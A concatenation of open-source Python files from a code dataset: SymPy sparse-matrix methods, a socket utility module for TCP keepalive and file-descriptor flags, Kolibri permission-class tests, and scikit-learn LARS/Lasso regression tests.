self.cols -= 1
def row_swap(self, i, j):
"""Swap, in place, columns i and j.
Examples
========
>>> from sympy.matrices import SparseMatrix
>>> S = SparseMatrix.eye(3); S[2, 1] = 2
>>> S.row_swap(1, 0); S
Matrix([
[0, 1, 0],
[1, 0, 0],
[0, 2, 1]])
"""
if i > j:
i, j = j, i
rows = self.row_list()
temp = []
for ii, jj, v in rows:
if ii == i:
self._smat.pop((ii, jj))
temp.append((jj, v))
elif ii == j:
self._smat.pop((ii, jj))
self._smat[i, jj] = v
elif ii > j:
break
for k, v in temp:
self._smat[j, k] = v
def col_swap(self, i, j):
"""Swap, in place, columns i and j.
Examples
========
>>> from sympy.matrices import SparseMatrix
>>> S = SparseMatrix.eye(3); S[2, 1] = 2
>>> S.col_swap(1, 0); S
Matrix([
[0, 1, 0],
[1, 0, 0],
[2, 0, 1]])
"""
if i > j:
i, j = j, i
rows = self.col_list()
temp = []
for ii, jj, v in rows:
if jj == i:
self._smat.pop((ii, jj))
temp.append((ii, v))
elif jj == j:
self._smat.pop((ii, jj))
self._smat[ii, i] = v
elif jj > j:
break
for k, v in temp:
self._smat[k, j] = v
def row_join(self, other):
"""Returns B appended after A (column-wise augmenting)::
[A B]
Examples
========
>>> from sympy import SparseMatrix, Matrix
>>> A = SparseMatrix(((1, 0, 1), (0, 1, 0), (1, 1, 0)))
>>> A
Matrix([
[1, 0, 1],
[0, 1, 0],
[1, 1, 0]])
>>> B = SparseMatrix(((1, 0, 0), (0, 1, 0), (0, 0, 1)))
>>> B
Matrix([
[1, 0, 0],
[0, 1, 0],
[0, 0, 1]])
>>> C = A.row_join(B); C
Matrix([
[1, 0, 1, 1, 0, 0],
[0, 1, 0, 0, 1, 0],
[1, 1, 0, 0, 0, 1]])
>>> C == A.row_join(Matrix(B))
True
Joining at row ends is the same as appending columns at the end
of the matrix:
>>> C == A.col_insert(A.cols, B)
True
"""
A, B = self, other
if not A.rows == B.rows:
raise ShapeError()
A = A.copy()
if not isinstance(B, SparseMatrix):
k = 0
b = B._mat
for i in range(B.rows):
for j in range(B.cols):
v = b[k]
if v:
A._smat[(i, j + A.cols)] = v
k += 1
else:
for (i, j), v in B._smat.items():
A._smat[(i, j + A.cols)] = v
A.cols += B.cols
return A
def col_join(self, other):
"""Returns B augmented beneath A (row-wise joining)::
[A]
[B]
Examples
========
>>> from sympy import SparseMatrix, Matrix, ones
>>> A = SparseMatrix(ones(3))
>>> A
Matrix([
[1, 1, 1],
[1, 1, 1],
[1, 1, 1]])
>>> B = SparseMatrix.eye(3)
>>> B
Matrix([
[1, 0, 0],
[0, 1, 0],
[0, 0, 1]])
>>> C = A.col_join(B); C
Matrix([
[1, 1, 1],
[1, 1, 1],
[1, 1, 1],
[1, 0, 0],
[0, 1, 0],
[0, 0, 1]])
>>> C == A.col_join(Matrix(B))
True
Joining along columns is the same as appending rows at the end
of the matrix:
>>> C == A.row_insert(A.rows, Matrix(B))
True
"""
A, B = self, other
if not A.cols == B.cols:
raise ShapeError()
A = A.copy()
if not isinstance(B, SparseMatrix):
k = 0
b = B._mat
for i in range(B.rows):
for j in range(B.cols):
v = b[k]
if v:
A._smat[(i + A.rows, j)] = v
k += 1
else:
for (i, j), v in B._smat.items():
A._smat[i + A.rows, j] = v
A.rows += B.rows
return A
def copyin_list(self, key, value):
if not is_sequence(value):
raise TypeError("`value` must be of type list or tuple.")
self.copyin_matrix(key, Matrix(value))
def copyin_matrix(self, key, value):
# include this here because it's not part of BaseMatrix
rlo, rhi, clo, chi = self.key2bounds(key)
shape = value.shape
dr, dc = rhi - rlo, chi - clo
if shape != (dr, dc):
raise ShapeError(
"The Matrix `value` doesn't have the same dimensions "
"as the in sub-Matrix given by `key`.")
if not isinstance(value, SparseMatrix):
for i in range(value.rows):
for j in range(value.cols):
self[i + rlo, j + clo] = value[i, j]
else:
if (rhi - rlo)*(chi - clo) < len(self):
for i in range(rlo, rhi):
for j in range(clo, chi):
self._smat.pop((i, j), None)
else:
for i, j, v in self.row_list():
if rlo <= i < rhi and clo <= j < chi:
self._smat.pop((i, j), None)
for k, v in value._smat.items():
i, j = k
self[i + rlo, j + clo] = value[i, j]
def zip_row_op(self, i, k, f):
"""In-place operation on row ``i`` using two-arg functor whose args are
interpreted as ``(self[i, j], self[k, j])``.
Examples
========
>>> from sympy.matrices import SparseMatrix
>>> M = SparseMatrix.eye(3)*2
>>> M[0, 1] = -1
>>> M.zip_row_op(1, 0, lambda v, u: v + 2*u); M
Matrix([
[2, -1, 0],
[4, 0, 0],
[0, 0, 2]])
See Also
========
row
row_op
col_op
"""
self.row_op(i, lambda v, j: f(v, self[k, j]))
def row_op(self, i, f):
"""In-place operation on row ``i`` using two-arg functor whose args are
interpreted as ``(self[i, j], j)``.
Examples
========
>>> from sympy.matrices import SparseMatrix
>>> M = SparseMatrix.eye(3)*2
>>> M[0, 1] = -1
>>> M.row_op(1, lambda v, j: v + 2*M[0, j]); M
Matrix([
[2, -1, 0],
[4, 0, 0],
[0, 0, 2]])
See Also
========
row
zip_row_op
col_op
"""
for j in range(self.cols):
v = self._smat.get((i, j), S.Zero)
fv = f(v, j)
if fv:
self._smat[(i, j)] = fv
elif v:
self._smat.pop((i, j))
def col_op(self, j, f):
"""In-place operation on col j using two-arg functor whose args are
interpreted as (self[i, j], i) for i in range(self.rows).
Examples
========
>>> from sympy.matrices import SparseMatrix
>>> M = SparseMatrix.eye(3)*2
>>> M[1, 0] = -1
>>> M.col_op(1, lambda v, i: v + 2*M[i, 0]); M
Matrix([
[ 2, 4, 0],
[-1, 0, 0],
[ 0, 0, 2]])
"""
for i in range(self.rows):
v = self._smat.get((i, j), S.Zero)
fv = f(v, i)
if fv:
self._smat[(i, j)] = fv
elif v:
self._smat.pop((i, j))
def fill(self, value):
"""Fill self with the given value.
Notes
=====
Unless many values are going to be deleted (i.e. set to zero)
this will create a matrix that is slower than a dense matrix in
operations.
Examples
========
>>> from sympy.matrices import SparseMatrix
>>> M = SparseMatrix.zeros(3); M
Matrix([
[0, 0, 0],
[0, 0, 0],
[0, 0, 0]])
>>> M.fill(1); M
Matrix([
[1, 1, 1],
[1, 1, 1],
[1, 1, 1]])
"""
if not value:
self._smat = {}
else:
v = self._sympify(value)
self._smat = dict([((i, j), v)
for i in range(self.rows) for j in range(self.cols)])
| bsd-3-clause | -4,068,299,058,737,986,000 | 27.363873 | 112 | 0.439613 | false |
aarmea/McMillen12Step-bitwig | client/sockutil.py | 1 | 5038 | """Various low-level utility functions for sockets.
Modified from https://github.com/markokr/skytools/blob/018d85b644f24cadef344e562aded22fee14d036/python/skytools/sockutil.py
Original license
================
SkyTools - tool collection for PostgreSQL
Copyright (c) 2007 Marko Kreen, Skype Technologies
Permission to use, copy, modify, and/or distribute this software for any
purpose with or without fee is hereby granted, provided that the above
copyright notice and this permission notice appear in all copies.
THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
"""
__all__ = ['set_tcp_keepalive', 'set_nonblocking', 'set_cloexec']
import sys
import os
import socket
try:
import fcntl
except ImportError:
pass
__all__ = ['set_tcp_keepalive', 'set_nonblocking', 'set_cloexec']
def set_tcp_keepalive(fd, keepalive = True,
tcp_keepidle = 4 * 60,
tcp_keepcnt = 4,
tcp_keepintvl = 15):
"""Turn on TCP keepalive. The fd can be either numeric or socket
object with 'fileno' method.
OS defaults for SO_KEEPALIVE=1:
- Linux: (7200, 9, 75) - can configure all.
- MacOS: (7200, 8, 75) - can configure only tcp_keepidle.
- Win32: (7200, 5|10, 1) - can configure tcp_keepidle and tcp_keepintvl.
Our defaults: (240, 4, 15).
>>> import socket
>>> s = socket.socket()
>>> set_tcp_keepalive(s)
"""
# usable on this OS?
if not hasattr(socket, 'SO_KEEPALIVE'):
return
# need socket object
if isinstance(fd, socket.SocketType):
s = fd
elif hasattr(socket, 'fromfd'):
if hasattr(fd, 'fileno'):
fd = fd.fileno()
s = socket.fromfd(fd, socket.AF_INET, socket.SOCK_STREAM)
else:
return
# skip if unix socket
if type(s.getsockname()) != type(()):
return
# no keepalive?
if not keepalive:
s.setsockopt(socket.SOL_SOCKET, socket.SO_KEEPALIVE, 0)
return
# basic keepalive
s.setsockopt(socket.SOL_SOCKET, socket.SO_KEEPALIVE, 1)
# detect available options
TCP_KEEPCNT = getattr(socket, 'TCP_KEEPCNT', None)
TCP_KEEPINTVL = getattr(socket, 'TCP_KEEPINTVL', None)
TCP_KEEPIDLE = getattr(socket, 'TCP_KEEPIDLE', None)
TCP_KEEPALIVE = getattr(socket, 'TCP_KEEPALIVE', None)
SIO_KEEPALIVE_VALS = getattr(socket, 'SIO_KEEPALIVE_VALS', None)
if TCP_KEEPIDLE is None and TCP_KEEPALIVE is None and sys.platform == 'darwin':
TCP_KEEPALIVE = 0x10
# configure
if TCP_KEEPCNT is not None:
s.setsockopt(socket.IPPROTO_TCP, TCP_KEEPCNT, tcp_keepcnt)
if TCP_KEEPINTVL is not None:
s.setsockopt(socket.IPPROTO_TCP, TCP_KEEPINTVL, tcp_keepintvl)
if TCP_KEEPIDLE is not None:
s.setsockopt(socket.IPPROTO_TCP, TCP_KEEPIDLE, tcp_keepidle)
elif TCP_KEEPALIVE is not None:
s.setsockopt(socket.IPPROTO_TCP, TCP_KEEPALIVE, tcp_keepidle)
elif SIO_KEEPALIVE_VALS is not None:
s.ioctl(SIO_KEEPALIVE_VALS, (1, tcp_keepidle*1000, tcp_keepintvl*1000))
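# Illustrative usage sketch (the host and port below are hypothetical, not
# part of this module): tune the probe timing on a long-lived client socket.
#
#     s = socket.socket()
#     s.connect(('db.example.com', 5432))
#     set_tcp_keepalive(s, tcp_keepidle=60, tcp_keepcnt=3, tcp_keepintvl=10)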
def set_nonblocking(fd, onoff=True):
"""Toggle the O_NONBLOCK flag.
If onoff==None then return current setting.
Actual sockets from 'socket' module should use .setblocking() method,
this is for situations where it is not available. Eg. pipes
from 'subprocess' module.
>>> import socket
>>> s = socket.socket()
>>> set_nonblocking(s, None)
False
>>> set_nonblocking(s, 1)
>>> set_nonblocking(s, None)
True
"""
flags = fcntl.fcntl(fd, fcntl.F_GETFL)
if onoff is None:
return (flags & os.O_NONBLOCK) > 0
if onoff:
flags |= os.O_NONBLOCK
else:
flags &= ~os.O_NONBLOCK
fcntl.fcntl(fd, fcntl.F_SETFL, flags)
def set_cloexec(fd, onoff=True):
"""Toggle the FD_CLOEXEC flag.
If onoff==None then return current setting.
Some libraries do it automatically (eg. libpq).
Others do not (Python stdlib).
>>> import os
>>> f = open(os.devnull, 'rb')
>>> set_cloexec(f, None)
False
>>> set_cloexec(f, True)
>>> set_cloexec(f, None)
True
>>> import socket
>>> s = socket.socket()
>>> set_cloexec(s, None)
False
>>> set_cloexec(s)
>>> set_cloexec(s, None)
True
"""
flags = fcntl.fcntl(fd, fcntl.F_GETFD)
if onoff is None:
return (flags & fcntl.FD_CLOEXEC) > 0
if onoff:
flags |= fcntl.FD_CLOEXEC
else:
flags &= ~fcntl.FD_CLOEXEC
fcntl.fcntl(fd, fcntl.F_SETFD, flags)
if __name__ == '__main__':
import doctest
doctest.testmod()
| mit | -6,819,269,375,270,745,000 | 28.988095 | 123 | 0.64867 | false |
benjaoming/kolibri | kolibri/auth/test/test_permissions_classes.py | 3 | 5747 | from __future__ import absolute_import, print_function, unicode_literals
from django.test import TestCase
from mock import Mock
from .helpers import create_superuser
from ..models import FacilityUser, Facility, KolibriAnonymousUser
from ..api import KolibriAuthPermissions
from ..permissions.base import BasePermissions
from ..permissions.general import AllowAll, DenyAll
class BasePermissionsThrowExceptionsTestCase(TestCase):
def setUp(self):
self.facility = Facility.objects.create()
self.object = object() # shouldn't matter what the object is, for these tests
self.facility_user = FacilityUser.objects.create(username="qqq", facility=self.facility)
self.superuser = create_superuser(self.facility)
self.anon_user = KolibriAnonymousUser()
self.permissions = BasePermissions()
def test_user_cannot_create(self):
with self.assertRaises(NotImplementedError):
self.assertFalse(self.permissions.user_can_create_object(self.facility_user, self.object))
with self.assertRaises(NotImplementedError):
self.assertFalse(self.permissions.user_can_create_object(self.superuser, self.object))
with self.assertRaises(NotImplementedError):
self.assertFalse(self.permissions.user_can_create_object(self.anon_user, self.object))
def test_user_cannot_read(self):
with self.assertRaises(NotImplementedError):
self.assertFalse(self.permissions.user_can_read_object(self.facility_user, self.object))
with self.assertRaises(NotImplementedError):
self.assertFalse(self.permissions.user_can_read_object(self.superuser, self.object))
with self.assertRaises(NotImplementedError):
self.assertFalse(self.permissions.user_can_read_object(self.anon_user, self.object))
def test_user_cannot_update(self):
with self.assertRaises(NotImplementedError):
self.assertFalse(self.permissions.user_can_update_object(self.facility_user, self.object))
with self.assertRaises(NotImplementedError):
self.assertFalse(self.permissions.user_can_update_object(self.superuser, self.object))
with self.assertRaises(NotImplementedError):
self.assertFalse(self.permissions.user_can_update_object(self.anon_user, self.object))
def test_user_cannot_delete(self):
with self.assertRaises(NotImplementedError):
self.assertFalse(self.permissions.user_can_delete_object(self.facility_user, self.object))
with self.assertRaises(NotImplementedError):
self.assertFalse(self.permissions.user_can_delete_object(self.superuser, self.object))
with self.assertRaises(NotImplementedError):
self.assertFalse(self.permissions.user_can_delete_object(self.anon_user, self.object))
class TestBooleanOperationsOnPermissionClassesTestCase(TestCase):
def setUp(self):
self.facility = Facility.objects.create()
self.obj = object()
self.user = FacilityUser.objects.create(username='dummyuser', facility=self.facility)
self.queryset = FacilityUser.objects.all()
def assertAllowAll(self, perms, test_filtering=True):
self.assertTrue(perms.user_can_create_object(self.user, self.obj))
self.assertTrue(perms.user_can_read_object(self.user, self.obj))
self.assertTrue(perms.user_can_update_object(self.user, self.obj))
self.assertTrue(perms.user_can_delete_object(self.user, self.obj))
if test_filtering:
self.assertSetEqual(set(self.queryset), set(perms.readable_by_user_filter(self.user, self.queryset)))
def assertDenyAll(self, perms, test_filtering=True):
self.assertFalse(perms.user_can_create_object(self.user, self.obj))
self.assertFalse(perms.user_can_read_object(self.user, self.obj))
self.assertFalse(perms.user_can_update_object(self.user, self.obj))
self.assertFalse(perms.user_can_delete_object(self.user, self.obj))
if test_filtering:
self.assertEqual(len(perms.readable_by_user_filter(self.user, self.queryset)), 0)
def test_allow_or_allow(self):
self.assertAllowAll(AllowAll() | AllowAll())
def test_allow_or_deny(self):
self.assertAllowAll(AllowAll() | DenyAll())
def test_deny_or_allow(self):
self.assertAllowAll(DenyAll() | AllowAll())
def test_deny_or_deny(self):
self.assertDenyAll(DenyAll() | DenyAll())
def test_allow_and_allow(self):
self.assertAllowAll(AllowAll() & AllowAll())
def test_allow_and_deny(self):
self.assertDenyAll(AllowAll() & DenyAll())
def test_deny_and_allow(self):
self.assertDenyAll(DenyAll() & AllowAll())
def test_deny_and_deny(self):
self.assertDenyAll(DenyAll() & DenyAll())
def test_or_is_shortcircuited_for_efficiency(self):
self.assertAllowAll(AllowAll() | BasePermissions(), test_filtering=False)
def test_and_is_shortcircuited_for_efficiency(self):
self.assertDenyAll(DenyAll() & BasePermissions(), test_filtering=False)
def test_or_is_not_shortcircuited_inappropriately(self):
with self.assertRaises(NotImplementedError):
self.assertAllowAll(BasePermissions() | AllowAll())
def test_and_is_not_shortcircuited_inappropriately(self):
with self.assertRaises(NotImplementedError):
self.assertDenyAll(BasePermissions() & DenyAll())
class KolibriAuthPermissionsTestCase(TestCase):
def test_bad_request_method(self):
request = Mock(method="BADWOLF")
view = Mock()
obj = Mock()
perm_obj = KolibriAuthPermissions()
self.assertFalse(perm_obj.has_object_permission(request, view, obj))
| mit | -4,047,654,272,939,319,300 | 44.611111 | 113 | 0.708544 | false |
mehdidc/scikit-learn | sklearn/linear_model/tests/test_least_angle.py | 11 | 16102 | from nose.tools import assert_equal
import numpy as np
from scipy import linalg
from sklearn.utils.testing import assert_array_almost_equal
from sklearn.utils.testing import assert_true
from sklearn.utils.testing import assert_less
from sklearn.utils.testing import assert_greater
from sklearn.utils.testing import assert_raises
from sklearn.utils.testing import ignore_warnings, assert_warns_message
from sklearn.utils.testing import assert_no_warnings, assert_warns
from sklearn.utils import ConvergenceWarning
from sklearn import linear_model, datasets
diabetes = datasets.load_diabetes()
X, y = diabetes.data, diabetes.target
# TODO: use another dataset that has multiple drops
def test_simple():
"""
The principle of LARS is to keep the covariances tied and decreasing.
"""
# also test verbose output
from sklearn.externals.six.moves import cStringIO as StringIO
import sys
old_stdout = sys.stdout
try:
sys.stdout = StringIO()
alphas_, active, coef_path_ = linear_model.lars_path(
diabetes.data, diabetes.target, method="lar", verbose=10)
sys.stdout = old_stdout
for (i, coef_) in enumerate(coef_path_.T):
res = y - np.dot(X, coef_)
cov = np.dot(X.T, res)
C = np.max(abs(cov))
eps = 1e-3
ocur = len(cov[C - eps < abs(cov)])
if i < X.shape[1]:
assert_true(ocur == i + 1)
else:
# no more than max_pred variables can go into the active set
assert_true(ocur == X.shape[1])
finally:
sys.stdout = old_stdout
def test_simple_precomputed():
"""
The same, with precomputed Gram matrix
"""
G = np.dot(diabetes.data.T, diabetes.data)
alphas_, active, coef_path_ = linear_model.lars_path(
diabetes.data, diabetes.target, Gram=G, method="lar")
for i, coef_ in enumerate(coef_path_.T):
res = y - np.dot(X, coef_)
cov = np.dot(X.T, res)
C = np.max(abs(cov))
eps = 1e-3
ocur = len(cov[C - eps < abs(cov)])
if i < X.shape[1]:
assert_true(ocur == i + 1)
else:
# no more than max_pred variables can go into the active set
assert_true(ocur == X.shape[1])
def test_all_precomputed():
"""
Test that lars_path with precomputed Gram and Xy gives the right answer
"""
X, y = diabetes.data, diabetes.target
G = np.dot(X.T, X)
Xy = np.dot(X.T, y)
for method in 'lar', 'lasso':
output = linear_model.lars_path(X, y, method=method)
output_pre = linear_model.lars_path(X, y, Gram=G, Xy=Xy, method=method)
for expected, got in zip(output, output_pre):
assert_array_almost_equal(expected, got)
def test_lars_lstsq():
"""
Test that Lars gives least square solution at the end
of the path
"""
X1 = 3 * diabetes.data # use un-normalized dataset
clf = linear_model.LassoLars(alpha=0.)
clf.fit(X1, y)
coef_lstsq = np.linalg.lstsq(X1, y)[0]
assert_array_almost_equal(clf.coef_, coef_lstsq)
def test_lasso_gives_lstsq_solution():
"""
Test that Lars Lasso gives least square solution at the end
of the path
"""
alphas_, active, coef_path_ = linear_model.lars_path(X, y, method="lasso")
coef_lstsq = np.linalg.lstsq(X, y)[0]
assert_array_almost_equal(coef_lstsq, coef_path_[:, -1])
def test_collinearity():
"""Check that lars_path is robust to collinearity in input"""
X = np.array([[3., 3., 1.],
[2., 2., 0.],
[1., 1., 0]])
y = np.array([1., 0., 0])
f = ignore_warnings
_, _, coef_path_ = f(linear_model.lars_path)(X, y, alpha_min=0.01)
assert_true(not np.isnan(coef_path_).any())
residual = np.dot(X, coef_path_[:, -1]) - y
assert_less((residual ** 2).sum(), 1.) # just make sure it's bounded
n_samples = 10
X = np.random.rand(n_samples, 5)
y = np.zeros(n_samples)
_, _, coef_path_ = linear_model.lars_path(X, y, Gram='auto', copy_X=False,
copy_Gram=False, alpha_min=0.,
method='lasso', verbose=0,
max_iter=500)
assert_array_almost_equal(coef_path_, np.zeros_like(coef_path_))
def test_no_path():
"""
Test that the ``return_path=False`` option returns the correct output
"""
alphas_, active_, coef_path_ = linear_model.lars_path(
diabetes.data, diabetes.target, method="lar")
alpha_, active, coef = linear_model.lars_path(
diabetes.data, diabetes.target, method="lar", return_path=False)
assert_array_almost_equal(coef, coef_path_[:, -1])
assert_true(alpha_ == alphas_[-1])
def test_no_path_precomputed():
"""
Test that the ``return_path=False`` option with Gram remains correct
"""
G = np.dot(diabetes.data.T, diabetes.data)
alphas_, active_, coef_path_ = linear_model.lars_path(
diabetes.data, diabetes.target, method="lar", Gram=G)
alpha_, active, coef = linear_model.lars_path(
diabetes.data, diabetes.target, method="lar", Gram=G,
return_path=False)
assert_array_almost_equal(coef, coef_path_[:, -1])
assert_true(alpha_ == alphas_[-1])
def test_no_path_all_precomputed():
"""
Test that the ``return_path=False`` option with Gram and Xy remains correct
"""
X, y = 3 * diabetes.data, diabetes.target
G = np.dot(X.T, X)
Xy = np.dot(X.T, y)
alphas_, active_, coef_path_ = linear_model.lars_path(
X, y, method="lasso", Gram=G, Xy=Xy, alpha_min=0.9)
print("---")
alpha_, active, coef = linear_model.lars_path(
X, y, method="lasso", Gram=G, Xy=Xy, alpha_min=0.9, return_path=False)
assert_array_almost_equal(coef, coef_path_[:, -1])
assert_true(alpha_ == alphas_[-1])
def test_singular_matrix():
# Test when input is a singular matrix
X1 = np.array([[1, 1.], [1., 1.]])
y1 = np.array([1, 1])
alphas, active, coef_path = linear_model.lars_path(X1, y1)
assert_array_almost_equal(coef_path.T, [[0, 0], [1, 0]])
def test_rank_deficient_design():
# consistency test that checks that LARS Lasso is handling rank
# deficient input data (with n_features < rank) in the same way
# as coordinate descent Lasso
y = [5, 0, 5]
for X in ([[5, 0],
[0, 5],
[10, 10]],
[[10, 10, 0],
[1e-32, 0, 0],
[0, 0, 1]],
):
# To be able to use the coefs to compute the objective function,
# we need to turn off normalization
lars = linear_model.LassoLars(.1, normalize=False)
coef_lars_ = lars.fit(X, y).coef_
obj_lars = (1. / (2. * 3.)
* linalg.norm(y - np.dot(X, coef_lars_)) ** 2
+ .1 * linalg.norm(coef_lars_, 1))
coord_descent = linear_model.Lasso(.1, tol=1e-6, normalize=False)
coef_cd_ = coord_descent.fit(X, y).coef_
obj_cd = ((1. / (2. * 3.)) * linalg.norm(y - np.dot(X, coef_cd_)) ** 2
+ .1 * linalg.norm(coef_cd_, 1))
assert_less(obj_lars, obj_cd * (1. + 1e-8))
def test_lasso_lars_vs_lasso_cd(verbose=False):
"""
Test that LassoLars and Lasso using coordinate descent give the
same results.
"""
X = 3 * diabetes.data
alphas, _, lasso_path = linear_model.lars_path(X, y, method='lasso')
lasso_cd = linear_model.Lasso(fit_intercept=False, tol=1e-8)
for c, a in zip(lasso_path.T, alphas):
if a == 0:
continue
lasso_cd.alpha = a
lasso_cd.fit(X, y)
error = linalg.norm(c - lasso_cd.coef_)
assert_less(error, 0.01)
# similar test, with the classifiers
for alpha in np.linspace(1e-2, 1 - 1e-2, 20):
clf1 = linear_model.LassoLars(alpha=alpha, normalize=False).fit(X, y)
clf2 = linear_model.Lasso(alpha=alpha, tol=1e-8,
normalize=False).fit(X, y)
err = linalg.norm(clf1.coef_ - clf2.coef_)
assert_less(err, 1e-3)
# same test, with normalized data
X = diabetes.data
alphas, _, lasso_path = linear_model.lars_path(X, y, method='lasso')
lasso_cd = linear_model.Lasso(fit_intercept=False, normalize=True,
tol=1e-8)
for c, a in zip(lasso_path.T, alphas):
if a == 0:
continue
lasso_cd.alpha = a
lasso_cd.fit(X, y)
error = linalg.norm(c - lasso_cd.coef_)
assert_less(error, 0.01)
def test_lasso_lars_vs_lasso_cd_early_stopping(verbose=False):
"""
Test that LassoLars and Lasso using coordinate descent give the
same results when early stopping is used.
(test : before, in the middle, and in the last part of the path)
"""
alphas_min = [10, 0.9, 1e-4]
for alphas_min in alphas_min:
alphas, _, lasso_path = linear_model.lars_path(X, y, method='lasso',
alpha_min=0.9)
lasso_cd = linear_model.Lasso(fit_intercept=False, tol=1e-8)
lasso_cd.alpha = alphas[-1]
lasso_cd.fit(X, y)
error = linalg.norm(lasso_path[:, -1] - lasso_cd.coef_)
assert_less(error, 0.01)
alphas_min = [10, 0.9, 1e-4]
# same test, with normalization
for alphas_min in alphas_min:
alphas, _, lasso_path = linear_model.lars_path(X, y, method='lasso',
alpha_min=0.9)
lasso_cd = linear_model.Lasso(fit_intercept=True, normalize=True,
tol=1e-8)
lasso_cd.alpha = alphas[-1]
lasso_cd.fit(X, y)
error = linalg.norm(lasso_path[:, -1] - lasso_cd.coef_)
assert_less(error, 0.01)
def test_lasso_lars_path_length():
# Test that the path length of the LassoLars is right
lasso = linear_model.LassoLars()
lasso.fit(X, y)
lasso2 = linear_model.LassoLars(alpha=lasso.alphas_[2])
lasso2.fit(X, y)
assert_array_almost_equal(lasso.alphas_[:3], lasso2.alphas_)
# Also check that the sequence of alphas is always decreasing
assert_true(np.all(np.diff(lasso.alphas_) < 0))
def test_lasso_lars_vs_lasso_cd_ill_conditioned():
# Test lasso lars on a very ill-conditioned design, and check that
# it does not blow up, and stays somewhat close to a solution given
# by the coordinate descent solver
# Also test that lasso_path (using lars_path output style) gives
# the same result as lars_path and previous lasso output style
# under these conditions.
rng = np.random.RandomState(42)
# Generate data
n, m = 70, 100
k = 5
X = rng.randn(n, m)
w = np.zeros((m, 1))
i = np.arange(0, m)
rng.shuffle(i)
supp = i[:k]
w[supp] = np.sign(rng.randn(k, 1)) * (rng.rand(k, 1) + 1)
y = np.dot(X, w)
sigma = 0.2
y += sigma * rng.rand(*y.shape)
y = y.squeeze()
lars_alphas, _, lars_coef = linear_model.lars_path(X, y, method='lasso')
_, lasso_coef2, _ = linear_model.lasso_path(X, y,
alphas=lars_alphas,
tol=1e-6,
fit_intercept=False)
assert_array_almost_equal(lars_coef, lasso_coef2, decimal=1)
def test_lasso_lars_vs_lasso_cd_ill_conditioned2():
# Create an ill-conditioned situation in which the LARS has to go
# far in the path to converge, and check that LARS and coordinate
# descent give the same answers
# Note it used to be the case that Lars had to use the drop for good
# strategy for this but this is no longer the case with the
# equality_tolerance checks
X = [[1e20, 1e20, 0],
[-1e-32, 0, 0],
[1, 1, 1]]
y = [10, 10, 1]
alpha = .0001
def objective_function(coef):
return (1. / (2. * len(X)) * linalg.norm(y - np.dot(X, coef)) ** 2
+ alpha * linalg.norm(coef, 1))
lars = linear_model.LassoLars(alpha=alpha, normalize=False)
assert_warns(ConvergenceWarning, lars.fit, X, y)
lars_coef_ = lars.coef_
lars_obj = objective_function(lars_coef_)
coord_descent = linear_model.Lasso(alpha=alpha, tol=1e-10, normalize=False)
cd_coef_ = coord_descent.fit(X, y).coef_
cd_obj = objective_function(cd_coef_)
assert_less(lars_obj, cd_obj * (1. + 1e-8))
def test_lars_add_features():
"""
Assure that at least some features get added if necessary.
Test for 6d2b4c.
"""
# Hilbert matrix
n = 5
H = 1. / (np.arange(1, n + 1) + np.arange(n)[:, np.newaxis])
clf = linear_model.Lars(fit_intercept=False).fit(
H, np.arange(n))
assert_true(np.all(np.isfinite(clf.coef_)))
def test_lars_n_nonzero_coefs(verbose=False):
lars = linear_model.Lars(n_nonzero_coefs=6, verbose=verbose)
lars.fit(X, y)
assert_equal(len(lars.coef_.nonzero()[0]), 6)
# The path should be of length 6 + 1 in a Lars going down to 6
# non-zero coefs
assert_equal(len(lars.alphas_), 7)
def test_multitarget():
"""
Assure that estimators receiving multidimensional y do the right thing
"""
X = diabetes.data
Y = np.vstack([diabetes.target, diabetes.target ** 2]).T
n_targets = Y.shape[1]
for estimator in (linear_model.LassoLars(), linear_model.Lars()):
estimator.fit(X, Y)
Y_pred = estimator.predict(X)
Y_dec = estimator.decision_function(X)
assert_array_almost_equal(Y_pred, Y_dec)
alphas, active, coef, path = (estimator.alphas_, estimator.active_,
estimator.coef_, estimator.coef_path_)
for k in range(n_targets):
estimator.fit(X, Y[:, k])
y_pred = estimator.predict(X)
assert_array_almost_equal(alphas[k], estimator.alphas_)
assert_array_almost_equal(active[k], estimator.active_)
assert_array_almost_equal(coef[k], estimator.coef_)
assert_array_almost_equal(path[k], estimator.coef_path_)
assert_array_almost_equal(Y_pred[:, k], y_pred)
def test_lars_cv():
""" Test the LassoLarsCV object by checking that the optimal alpha
increases as the number of samples increases.
This property is not actually guaranteed in general and is just a
property of the given dataset, with the given steps chosen.
"""
old_alpha = 0
lars_cv = linear_model.LassoLarsCV()
for length in (400, 200, 100):
X = diabetes.data[:length]
y = diabetes.target[:length]
lars_cv.fit(X, y)
np.testing.assert_array_less(old_alpha, lars_cv.alpha_)
old_alpha = lars_cv.alpha_
def test_lasso_lars_ic():
""" Test the LassoLarsIC object by checking that
- some good features are selected.
- alpha_bic > alpha_aic
- n_nonzero_bic < n_nonzero_aic
"""
lars_bic = linear_model.LassoLarsIC('bic')
lars_aic = linear_model.LassoLarsIC('aic')
rng = np.random.RandomState(42)
X = diabetes.data
y = diabetes.target
X = np.c_[X, rng.randn(X.shape[0], 4)] # add 4 bad features
lars_bic.fit(X, y)
lars_aic.fit(X, y)
nonzero_bic = np.where(lars_bic.coef_)[0]
nonzero_aic = np.where(lars_aic.coef_)[0]
assert_greater(lars_bic.alpha_, lars_aic.alpha_)
assert_less(len(nonzero_bic), len(nonzero_aic))
assert_less(np.max(nonzero_bic), diabetes.data.shape[1])
# test error on unknown IC
lars_broken = linear_model.LassoLarsIC('<unknown>')
assert_raises(ValueError, lars_broken.fit, X, y)
def test_no_warning_for_zero_mse():
"""LassoLarsIC should not warn for log of zero MSE."""
y = np.arange(10, dtype=float)
X = y.reshape(-1, 1)
lars = linear_model.LassoLarsIC(normalize=False)
assert_no_warnings(lars.fit, X, y)
assert_true(np.any(np.isinf(lars.criterion_)))
if __name__ == '__main__':
import nose
nose.runmodule()
| bsd-3-clause | 2,529,933,273,364,877,300 | 33.928416 | 79 | 0.589616 | false |
